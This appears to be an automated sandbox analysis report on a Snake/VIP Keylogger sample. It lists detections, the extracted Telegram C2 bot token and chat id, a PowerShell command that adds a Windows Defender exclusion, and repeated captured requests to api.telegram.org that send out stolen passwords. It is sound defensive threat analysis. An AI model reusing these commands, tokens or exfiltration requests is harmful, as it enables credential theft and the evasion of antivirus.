Windows Analysis Report
Yef4EqsQha.exe

Overview

General Information

Sample name: Yef4EqsQha.exe (renamed because original name is a hash value)
Original sample name: f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897.exe
Analysis ID: 1588250
MD5: 91ccccf28bcd650fc1f8e5256891211c
SHA1: 35ceec260d23f1aaa3b948060a0f4c5c926f9b73
SHA256: f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897
Tags: exe, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Yef4EqsQha.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
    • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Yef4EqsQha.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
    • Yef4EqsQha.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277"}
{"Exfil Mode": "Telegram", "Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat_id": "-4517865277", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d031:$a1: get_encryptedPassword
  • 0x2d346:$a2: get_encryptedUsername
  • 0x2ce41:$a3: get_timePasswordChanged
  • 0x2cf4a:$a4: get_passwordField
  • 0x2d047:$a5: set_encryptedPassword
  • 0x2e6e5:$a7: get_logins
  • 0x2e648:$a10: KeyLoggerEventArgs
  • 0x2e2ad:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
0.2.Yef4EqsQha.exe.3cce508.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Yef4EqsQha.exe.3cce508.2.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.Yef4EqsQha.exe.3cce508.2.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
6.2.Yef4EqsQha.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.Yef4EqsQha.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Yef4EqsQha.exe", ParentImage: C:\Users\user\Desktop\Yef4EqsQha.exe, ParentProcessId: 7640, ParentProcessName: Yef4EqsQha.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", ProcessId: 7848, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Yef4EqsQha.exe", ParentImage: C:\Users\user\Desktop\Yef4EqsQha.exe, ParentProcessId: 7640, ParentProcessName: Yef4EqsQha.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", ProcessId: 7848, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:06:26.398364+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49751 | 104.21.112.1 | 443 | TCP
2025-01-10T23:06:29.105641+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49773 | 104.21.112.1 | 443 | TCP
2025-01-10T23:06:34.333208+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49815 | 104.21.112.1 | 443 | TCP
2025-01-10T23:06:24.708171+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49732 | 193.122.6.168 | 80 | TCP
2025-01-10T23:06:25.833163+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49732 | 193.122.6.168 | 80 | TCP
2025-01-10T23:06:27.098861+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49757 | 193.122.6.168 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:06:36.689951+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49834 | 149.154.167.220 | 443 | TCP


                    AV Detection

Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat_id": "-4517865277", "Version": "4.4"}
Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277"}
Source: Yef4EqsQha.exe.7872.6.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}
Source: Yef4EqsQha.exe | ReversingLabs: Detection: 82%
Source: Yef4EqsQha.exe | Virustotal: Detection: 70%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Yef4EqsQha.exe | Joe Sandbox ML: detected

                    Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Yef4EqsQha.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49744 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 192.168.2.7:49807 -> 104.21.112.1:443 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50037 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50038 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50039 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50040 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50041 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50042 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50043 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50044 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50045 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50046 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50047 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50048 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50049 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50050 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50051 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50052 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50053 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50054 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50055 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50056 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50057 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50058 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50059 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50060 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50061 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50062 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50063 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50064 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50065 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50067 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50069 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50070 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50072 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50073 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50075 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50079 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50080 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50081 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50084 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50087 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50088 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50089 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50090 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50091 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50092 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50094 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50095 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50096 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50097 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50098 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50099 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50100 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50101 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50102 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50103 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50104 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50105 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50106 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50107 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50108 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50109 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50110 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50111 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50112 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50113 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50114 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50115 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50116 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50117 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50118 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50119 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50120 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50121 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50122 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50123 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50124 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50125 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50126 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50127 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50128 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50129 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50130 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50131 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50132 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50133 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50134 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50135 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50136 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50137 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50138 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50139 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50140 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50141 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50142 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50143 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50144 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50145 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50146 version: TLS 1.2
                    Source: Yef4EqsQha.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: UIQk.pdbSHA256 source: Yef4EqsQha.exe
                    Source: Binary string: UIQk.pdb source: Yef4EqsQha.exe
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Code function: 4x nop then jmp 077F84BAh 0_2_077F7B83

                    Networking

                    Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49884 -> 149.154.167.220:443
                    Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49834 -> 149.154.167.220:443
                    Source: unknown DNS query: name: api.telegram.org
                    Source: Yara match File source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139 Host: api.telegram.org Content-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3386f64b78bdHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd339547c57964Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33a4dfa3e873Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33b470d7c755Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33c3fb5a06a6Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33d37f258c37Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3420b602a22eHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3433ee6a7188Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3445d7475f3bHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd345a462c9585Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3473c556f1ebHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34dd1c714d92Host: api.telegram.orgContent-Length: 585
